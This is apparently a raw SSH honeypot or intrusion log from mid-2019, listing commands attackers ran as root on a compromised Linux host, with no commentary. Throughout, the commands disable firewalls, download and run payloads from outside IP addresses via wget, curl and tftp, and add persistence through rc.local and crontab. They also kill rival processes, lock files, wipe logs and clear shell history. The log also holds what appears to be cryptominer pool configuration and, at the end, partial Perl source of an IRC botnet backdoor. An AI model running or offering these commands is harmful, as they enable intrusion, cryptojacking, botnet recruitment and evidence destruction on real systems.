chmod 777 Linux-udp250
./Linux-udp250
echo "cd /tmp/">>/etc/rc.local
echo "./Linux-udp250
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://222.186.51.34:1500/Linux-udp250
chmod 777 udp25000
./udp25000
echo "cd /tmp/">>/etc/rc.local
echo "./udp25000
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://222.186.51.34:1500/Linux-udp250
chmod 777 udp25000
./udp25000
echo "cd /tmp/">>/etc/rc.local
echo "./udp25000
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://222.186.51.34:1500/Linux-udp250
chmod 777 udp25000
./udp25000
echo "cd /tmp/">>/etc/rc.local
echo "./udp25000
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 182.243.150.198 23-Jul-2019 04:31:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://156.236.96.30:8899/linux-mips;chmod 777 linux-mips;./linux-mips;echo "cd /tmp/">>/etc/rc.local;echo "./linux-mips&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://156.236.96.30:8899/linux-mips
chmod 777 linux-mips
./linux-mips
echo "cd /tmp/">>/etc/rc.local
echo "./linux-mips
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 14.116.204.194 23-Jul-2019 04:38:55 ssh2 root
ssh root@222.92.146.74
123456, "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "user-agent": null, "watch": false}'>
cd /opt/nu
mv renice ssh-daemon
sed -i -e 's/renice/ssh-daemon/g' /opt/nu/service
#others # a=`ps ahux --sort=-c | awk '{if($3>10.0)printf"%6d\n",$2,$11}'`
for i in $a
do a=`readlink /proc/$i/exe`
kill -9 $i
cp $a $a.old
chattr -ia $a
chmod -x $a
rm -rf $a
touch $a
chattr +ia $a
done
# everyone not ssh-daemon #a=`ps ahux --sort=-c | awk '{if($3>10.0
$11!="/opt/nu/ssh-daemon"
$11!="/usr/bin/sudo"
$11!="/bin/bash")printf"%6d\n",$2,$11}'`
for i in $a
do a=`readlink /proc/$i/exe`
kill -9 $i
cp $a $a.old
chattr -ia $a
chmod -x $a
rm -rf $a
touch $a
chattr +ia $a
done
cat << EOF
!/bin/bash
cd /tmp
rm -rf .X15-unix
mkdir .X15-unix
cd .X15-unix
pkill -9 cron > .out
wget -q http://54.37.70.249/dota2.tar.gz || curl -O -f http://54.37.70.249/dota2.tar.gz
sleep 7s && tar xf dota2.tar.gz
#rm -rf dota2.tar.gz
cd .rsync
chmod 777 *
cd /tmp/.X15-unix/.rsync/a && ./cron || ./anacron
exit 0
EOF | watch -n 5 bash > /dev/null
crontab /opt/nu/service
/opt/nu/ssh-daemon
echo 'alias top="top -o COMMAND"' >> ~/.bashrc
source ~/.bashrc
lscpu pidof ssh-daemon rm -rf /var/log/*
rm -rf /tmp/HT8sUy
touch /tmp/HT8sUy
chattr +ia /tmp/HT8sUy
pkill -9 HT8sUy
history -c
}, { "url": "103.253.40.188:443", "user": "8AriWF4frRPjgpJfgUYjLR5SML2Dz3eTc9iEMRbvt41SF6vzeJq1sJsRrc8iWYerVNZfs8rctwhvRFXgd2Cc64F3UmYvQNS", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant":
cd /opt/nu
mv renice ssh-daemon
sed -i -e 's/renice/ssh-daemon/g' /opt/nu/service
#others # a=`ps ahux --sort=-c | awk '{if($3>10.0)printf"%6d\n",$2,$11}'`
for i in $a
do a=`readlink /proc/$i/exe`
kill -9 $i
cp $a $a.old
chattr -ia $a
chmod -x $a
rm -rf $a
touch $a
chattr +ia $a
done
# everyone not ssh-daemon #a=`ps ahux --sort=-c | awk '{if($3>10.0
$11!="/opt/nu/ssh-daemon"
$11!="/usr/bin/sudo"
$11!="/bin/bash")printf"%6d\n",$2,$11}'`
for i in $a
do a=`readlink /proc/$i/exe`
kill -9 $i
cp $a $a.old
chattr -ia $a
chmod -x $a
rm -rf $a
touch $a
chattr +ia $a
done
cat << EOF
a=`ps ahux --sort=-c | awk '{if($3>10.0 && $11!="/opt/nu/ssh-daemon" && $11!="/usr/bin/sudo" && $11!="/bin/bash")printf"%6d\n",$2,$11}'`;for i in $a; do a=`readlink /proc/$i/exe`;kill -9 $i; cp $a $a.old;chattr -ia $a; chmod -x $a;rm -rf $a;touch $a; chattr +ia $a;  done;
EOF | watch -n 5 /bin/bash > /dev/null
crontab /opt/nu/service
/opt/nu/ssh-daemon
echo 'alias top="top -o COMMAND"' >> ~/.bashrc
source ~/.bashrc
lscpu pidof ssh-daemon rm -rf /var/log/*
rm -rf /tmp/HT8sUy
touch /tmp/HT8sUy
chattr +ia /tmp/HT8sUy
pkill -9 HT8sUy
history -c

From 62.231.102.116 23-Jul-2019 07:33:20 ssh2 root
w
free -mt
ls -a
cat/etc/issue
cat /etc/issue
ls -a
halt

From 94.62.245.112 24-Jul-2019 02:22:56 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.41.73/bin.sh || curl http://46.246.41.73/curl.sh -o curl.sh || tftp 46.246.41.73 -c get tftp.sh || tftp -r tftp.sh -g 46.246.41.73; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.41.73/bin.sh || curl http://46.246.41.73/curl.sh -o curl.sh || tftp 46.246.41.73 -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 211.58.49.145 26-Jul-2019 14:13:31 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.43.180/bin.sh || curl http://46.246.43.180/curl.sh -o curl.sh || tftp 46.246.43.180 -c get tftp.sh || tftp -r tftp.sh -g 46.246.43.180; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.43.180/bin.sh || curl http://46.246.43.180/curl.sh -o curl.sh || tftp 46.246.43.180 -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 218.61.16.177 26-Jul-2019 16:56:17 ssh2 root
wget http://218.61.16.177:8080/LinuxTF chmod 0777 LinuxTF chmod 0777 LinuxTF ./LinuxTF

From 180.126.195.173 27-Jul-2019 00:13:47 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.38.70/bin.sh || curl http://46.246.38.70/curl.sh -o curl.sh || tftp 46.246.38.70 -c get tftp.sh || tftp -r tftp.sh -g 46.246.38.70; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.38.70/bin.sh || curl http://46.246.38.70/curl.sh -o curl.sh || tftp 46.246.38.70 -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 165.22.217.118 27-Jul-2019 02:46:44 ssh2 root
Exec wget http://91.209.70.174/Corona.x86_64; chmod 777 *; chmod 777 Corona.x86_64; ./Corona.x86_64 wget.roots; rm -rf Corona.x86_64 ;)
wget http://91.209.70.174/Corona.x86_64
chmod 777 *
chmod 777 Corona.x86_64
./Corona.x86_64 wget.roots
rm -rf Corona.x86_64
)

From 194.55.187.11 27-Jul-2019 09:51:22 ssh2 root
Exec echo aaa
echo aaa

From 58.219.130.203 27-Jul-2019 18:16:23 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.63.229/bin.sh || curl http://46.246.63.229/curl.sh -o curl.sh || tftp 46.246.63.229 -c get tftp.sh || tftp -r tftp.sh -g 46.246.63.229; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.63.229/bin.sh || curl http://46.246.63.229/curl.sh -o curl.sh || tftp 46.246.63.229 -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 103.114.160.214 27-Jul-2019 21:59:56 ssh2 root
Exec wget -c http://103.40.23.235/SuperMine;chmod 0777 ./SuperMine;./SuperMine;
wget -c http://103.40.23.235/SuperMine
chmod 0777 ./SuperMine
./SuperMine

From 49.69.126.199 28-Jul-2019 06:29:15 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.63.214/bin.sh || curl http://46.246.63.214/curl.sh -o curl.sh || tftp 46.246.63.214 -c get tftp.sh || tftp -r tftp.sh -g 46.246.63.214; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.63.214/bin.sh || curl http://46.246.63.214/curl.sh -o curl.sh || tftp 46.246.63.214 -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 109.166.139.144 28-Jul-2019 19:03:56 ssh2 root
uname -a
history -c
w
nproc
cat /etc/issue
cat /proc/cpuinfo
ls -a
passwd

From 109.166.139.144 28-Jul-2019 19:08:07 ssh2 root
passwd
su
wget treeball.tripod.com/udp.pl
cd /dev/shm
ls -a
wget treeball.tripod.com/udp.pl
ls -a
perl udp.pl 116.236.120.162 0 00

From 49.69.37.96 29-Jul-2019 03:08:11 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.44.80/bin.sh || curl http://46.246.44.80/curl.sh -o curl.sh || tftp 46.246.44.80 -c get tftp.sh || tftp -r tftp.sh -g 46.246.44.80; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.44.80/bin.sh || curl http://46.246.44.80/curl.sh -o curl.sh || tftp 46.246.44.80 -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 37.52.145.14 29-Jul-2019 03:21:50 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://wpceservice.hldns.ru/bin.sh || curl http://wpceservice.hldns.ru/curl.sh -o curl.sh || tftp wpceservice.hldns.ru -c get tftp.sh || tftp -r tftp.sh -g wpceservice.hldns.ru; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://wpceservice.hldns.ru/bin.sh || curl http://wpceservice.hldns.ru/curl.sh -o curl.sh || tftp wpceservice.hldns.ru -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 31.30.120.136 29-Jul-2019 07:04:02 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 [kswapd9];killall -9 [kworker];killall -9 [rcu_scheds];killall -9 [kaudit];killall -9 [watchd0g];killall -9 [khelper0];killall -9 [kacpuid];killall -9 [zftpd];killall -9 [crond];killall -9 [udevd];killall -9 [khelp];killall -9 [sync_s];killall -9 [rpcbind];killall -9 rsync;killall -9 ircu;killall -9 super_z;killall -9 [pcu];killall -9 [rcu_scheds];killall -9 [kwin];killall -9 [khelper0];killall -9 [kacpuid];killall -9 [tfpd];killall -9 [crop];killall -9 [udevd];killall -9 [kh0];killall -9 [sync_t];killall -9 [rpc_bind];cd /tmp;rm -rf zyk;wget -q 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 [kswapd9]
killall -9 [kworker]
killall -9 [rcu_scheds]
killall -9 [kaudit]
killall -9 [watchd0g]
killall -9 [khelper0]
killall -9 [kacpuid]
killall -9 [zftpd]
killall -9 [crond]
killall -9 [udevd]
killall -9 [khelp]
killall -9 [sync_s]
killall -9 [rpcbind]
killall -9 rsync
killall -9 ircu
killall -9 super_z
killall -9 [pcu]
killall -9 [rcu_scheds]
killall -9 [kwin]
killall -9 [khelper0]
killall -9 [kacpuid]
killall -9 [tfpd]
killall -9 [crop]
killall -9 [udevd]
killall -9 [kh0]
killall -9 [sync_t]
killall -9 [rpc_bind]
cd /tmp
rm -rf zyk
wget -q 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a

From 109.166.139.144 29-Jul-2019 07:11:12 ssh2 root
history -c
w
cd /dev/shm
ls -a
wget treeball.tripod.com/udp.pl
yum install wget
apt-aget yumm
apt-aget yum
cat /etc/issue
cat /etc/hosts
cat /proc/cpuinfo

From 109.228.14.10 30-Jul-2019 14:19:49 ssh2 root
Exec uname -a;
uname -a

From 79.161.145.131 31-Jul-2019 06:17:12 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.44.146/bin.sh || curl http://46.246.44.146/curl.sh -o curl.sh || tftp 46.246.44.146 -c get tftp.sh || tftp -r tftp.sh -g 46.246.44.146; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.44.146/bin.sh || curl http://46.246.44.146/curl.sh -o curl.sh || tftp 46.246.44.146 -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 109.166.139.144 1-Aug-2019 11:12:05 ssh2 root
history -c
cd /tmp
ls -a
wget escoaladesoferi@scoaladesoferi.ucoz.net/muhs.jpg
tar xvf muhs.jpg

From 45.55.46.204 1-Aug-2019 22:00:01 ssh2 root
Exec wget http://91.209.70.174/Corona.x86_64; chmod 777 *; chmod 777 Corona.x86_64; ./Corona.x86_64 wget.roots; rm -rf Corona.x86_64
wget http://91.209.70.174/Corona.x86_64
chmod 777 *
chmod 777 Corona.x86_64
./Corona.x86_64 wget.roots
rm -rf Corona.x86_64

From 93.122.251.230 2-Aug-2019 04:33:12 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
apt-get

From 93.122.251.230 2-Aug-2019 04:34:38 ssh2 root
locate index.php
pgk1
apt-get
apt-get install pkg1
ls
whereis sendmail
/etc/init.d/sendmail restart
cd /var/
ls
apt-get install mlocate
locate index.php
mlocate index.php

From 76.112.247.75 3-Aug-2019 15:51:43 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.45.139/bin.sh || curl http://46.246.45.139/curl.sh -o curl.sh || tftp 46.246.45.139 -c get tftp.sh || tftp -r tftp.sh -g 46.246.45.139; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.45.139/bin.sh || curl http://46.246.45.139/curl.sh -o curl.sh || tftp 46.246.45.139 -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 183.164.233.2 4-Aug-2019 02:35:30 ssh2 root
ps -ef
w
top
netstat -an
wget http://43.240.13.154:8888/syss

From 202.215.36.230 4-Aug-2019 03:10:06 ssh2 root
cd /var/tmp
cat << EOF
#!/bin/bash
cd /tmp
rm -rf .X15-unix
mkdir .X15-unix
cd .X15-unix
pkill -9 cron > .out
wget -q http://54.37.70.249/dota2.tar.gz || curl -O -f http://54.37.70.249/dota2.tar.gz
tar xf dota2.tar.gz
#rm -rf dota2.tar.gz
cd .rsync
chmod 777 *
cat /tmp/.X15-unix/.rsync/initall | bash 2>1&
exit 0
EOF | bash

From 183.164.233.2 4-Aug-2019 05:16:42 ssh2 root
ps -ef

From 164.68.108.34 4-Aug-2019 18:49:44 ssh2 root
Exec uname -a ; nproc && wget -qO - 189.7.177.5/a.pl|perl
uname -a
nproc
wget -qO - 189.7.177.5/a.pl|perl

From 5.13.223.55 5-Aug-2019 02:26:53 ssh2 root
ls
nproc
wgt
wget nasapaul.com/ninfo
passwd

From 5.13.223.55 5-Aug-2019 02:29:04 ssh2 root
wget
wget -c
wget U
wget nasapaul.com
wget nasapaul.com/ninfo

From 5.13.223.55 5-Aug-2019 03:36:41 ssh2 root
ls
fanelishere.tk/arhive/info
wget fanelishere.tk/arhive/info
nproc
halt
shutdown
kill
die
kill -9 -1

From 193.19.221.13 6-Aug-2019 13:44:02 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.35.20/bin.sh || curl http://46.246.35.20/curl.sh -o curl.sh || tftp 46.246.35.20 -c get tftp.sh || tftp -r tftp.sh -g 46.246.35.20; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.35.20/bin.sh || curl http://46.246.35.20/curl.sh -o curl.sh || tftp 46.246.35.20 -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 115.186.161.129 6-Aug-2019 14:59:24 ssh2 root
screen -list
free -m
uname -a
ls -lia
yum install screen
apt-get install screen
screen -list
nano
uname -a

From 115.186.161.129 6-Aug-2019 15:05:25 ssh2 root
ls
cat /etc/apt/sources.list

From 222.186.10.47 7-Aug-2019 07:38:09 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;

wget -c http://222.186.10.47:1500/24Mm;
chmod 777 24Mm;
./24Mm;
echo "cd /tmp/">>/etc/rc.local;
echo "./24Mm&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://222.186.10.47:1500/24Mm;
chmod 777 24Mm;
./24Mm;
echo "cd /tmp/">>/etc/rc.local;
echo "./24Mm&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://222.186.10.47:1500/24Mm;
chmod 777 24Mm;
./24Mm;
echo "cd /tmp/">>/etc/rc.local;
echo "./24Mm&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://222.186.10.47:1500/24Mm;
chmod 777 24Mm;
./24Mm;
echo "cd /tmp/">>/etc/rc.local;
echo "./24Mm&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.10.47:1500/24Mm
chmod 777 24Mm
./24Mm
echo "cd /tmp/">>/etc/rc.local
echo "./24Mm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://222.186.10.47:1500/24Mm
chmod 777 24Mm
./24Mm
echo "cd /tmp/">>/etc/rc.local
echo "./24Mm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://222.186.10.47:1500/24Mm
chmod 777 24Mm
./24Mm
echo "cd /tmp/">>/etc/rc.local
echo "./24Mm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://222.186.10.47:1500/24Mm
chmod 777 24Mm
./24Mm
echo "cd /tmp/">>/etc/rc.local
echo "./24Mm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;

wget -c http://222.186.10.47:1500/24Mm;
chmod 777 24Mm;
./24Mm;
echo "cd /tmp/">>/etc/rc.local;
echo "./24Mm&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://222.186.10.47:1500/24Mm;
chmod 777 24Mm;
./24Mm;
echo "cd /tmp/">>/etc/rc.local;
echo "./24Mm&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://222.186.10.47:1500/24Mm;
chmod 777 24Mm;
./24Mm;
echo "cd /tmp/">>/etc/rc.local;
echo "./24Mm&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://222.186.10.47:1500/24Mm;
chmod 777 24Mm;
./24Mm;
echo "cd /tmp/">>/etc/rc.local;
echo "./24Mm&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.10.47:1500/24Mm
chmod 777 24Mm
./24Mm
echo "cd /tmp/">>/etc/rc.local
echo "./24Mm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://222.186.10.47:1500/24Mm
chmod 777 24Mm
./24Mm
echo "cd /tmp/">>/etc/rc.local
echo "./24Mm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://222.186.10.47:1500/24Mm
chmod 777 24Mm
./24Mm
echo "cd /tmp/">>/etc/rc.local
echo "./24Mm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://222.186.10.47:1500/24Mm
chmod 777 24Mm
./24Mm
echo "cd /tmp/">>/etc/rc.local
echo "./24Mm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 222.186.10.47 7-Aug-2019 07:38:13 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;

wget -c http://222.186.10.47:1500/24Mm;
chmod 777 24Mm;
./24Mm;
echo "cd /tmp/">>/etc/rc.local;
echo "./24Mm&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://222.186.10.47:1500/24Mm;
chmod 777 24Mm;
./24Mm;
echo "cd /tmp/">>/etc/rc.local;
echo "./24Mm&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://222.186.10.47:1500/24Mm;
chmod 777 24Mm;
./24Mm;
echo "cd /tmp/">>/etc/rc.local;
echo "./24Mm&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://222.186.10.47:1500/24Mm;
chmod 777 24Mm;
./24Mm;
echo "cd /tmp/">>/etc/rc.local;
echo "./24Mm&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.10.47:1500/24Mm
chmod 777 24Mm
./24Mm
echo "cd /tmp/">>/etc/rc.local
echo "./24Mm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://222.186.10.47:1500/24Mm
chmod 777 24Mm
./24Mm
echo "cd /tmp/">>/etc/rc.local
echo "./24Mm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://222.186.10.47:1500/24Mm
chmod 777 24Mm
./24Mm
echo "cd /tmp/">>/etc/rc.local
echo "./24Mm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://222.186.10.47:1500/24Mm
chmod 777 24Mm
./24Mm
echo "cd /tmp/">>/etc/rc.local
echo "./24Mm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 58.218.213.128 8-Aug-2019 00:41:25 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /bin/;wget -c http://156.238.165.38:8080/wsvdos;chmod 777 wsvdos;./wsvdos;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /bin/
wget -c http://156.238.165.38:8080/wsvdos
chmod 777 wsvdos
./wsvdos

From 190.189.107.101 8-Aug-2019 09:22:44 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.43.10/bin.sh || curl http://46.246.43.10/curl.sh -o curl.sh || tftp 46.246.43.10 -c get tftp.sh || tftp -r tftp.sh -g 46.246.43.10; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.43.10/bin.sh || curl http://46.246.43.10/curl.sh -o curl.sh || tftp 46.246.43.10 -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 167.71.72.189 8-Aug-2019 22:01:24 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.81.20.95/dvep931w; chmod 777 dvep931w; sh dvep931w
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.81.20.95/dvep931w
chmod 777 dvep931w
sh dvep931w

From 18.224.94.182 9-Aug-2019 12:40:45 ssh2 root
Exec uname -a 2> /dev/null
uname -a 2> /dev/null

From 136.55.189.114 10-Aug-2019 00:13:44 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.62.38/bin.sh || curl http://46.246.62.38/curl.sh -o curl.sh || tftp 46.246.62.38 -c get tftp.sh || tftp -r tftp.sh -g 46.246.62.38; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.62.38/bin.sh || curl http://46.246.62.38/curl.sh -o curl.sh || tftp 46.246.62.38 -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 121.78.129.147 11-Aug-2019 03:03:36 ssh2 root
Exec cd /tmp || /var/tmp || /dev/shm
cat << EOF
my $processo = 'rsync';

$servidor='146.185.171.227' unless $servidor;
my $porta='443';
my @canais=("#pp");
my @adms=("A","X");
my @auth=("localhost");

my $linas_max=6;
my $sleep=3;

my $nick = getnick();
my $ircname = getnick();
my $realname = (`uname -a`);

my $acessoshell = 1;
my $prefixo = "! ";
my $estatisticas = 0;
my $pacotes = 1;

my $VERSAO = '0.2a';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0";
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();

sub getnick {
  return "x".int(rand(9999))."-".int(rand(9999));
}

sub getident {
  my $retornoident = &_get("http://www.minpop.com/sk12pack/idents.php");
  my $identchance = int(rand(1000));
  if ($identchance > 30) {
     return $nick;
  } else {
     return $retornoident;
  }
  return $retornoident;
}

sub getname {
  my $retornoname = &_get("http://www.minpop.com/sk12pack/names.php");
  return $retornoname;
}

sub getident2 {
        my $length=shift;
        $length = 3 if ($length < 3);

        my @chars=('a'..'z','A'..'Z','1'..'9');
        foreach (1..$length)
        {
                $randomstring.=$chars[rand @chars];
        }
        return $randomstring;
}

sub getstore ($$)
{
  my $url = shift;
  my $file = shift;

  $http_stream_out = 1;
  open(GET_OUTFILE, "> $file");
  %http_loop_check = ();
  _get($url);
  close GET_OUTFILE;
  return $main::http_get_result;
}

sub _get
{
  my $url = shift;
  my $proxy = "";
  grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
  if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {
    my $host = $1;
    my $port = $2 || 80;
    my $path = $3;
    $path = "/" unless defined($path);
    return _trivial_http_get($host, $port, $path);
  } elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {
    my $host = $1;
    my $port = $2;
    my $path = $url;
    return _trivial_http_get($host, $port, $path);
  } else {
    return undef;
  }
}

sub _trivial_http_get
{
  my($host, $port, $path) = @_;
  my($AGENT, $VERSION, $p);

  $AGENT = "get-minimal";
  $VERSION = "20000118";

  $path =~ s/ /%20/g;

  require IO::Socket;
  local($^W) = 0;
  my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                   PeerPort => $port,
                                   Proto   => 'tcp',
                                   Timeout  => 60) || return;
  $sock->autoflush;
  my $netloc = $host;
  $netloc .= ":$port" if $port != 80;
  my $request = "GET $path HTTP/1.0\015\012"
              . "Host: $netloc\015\012"
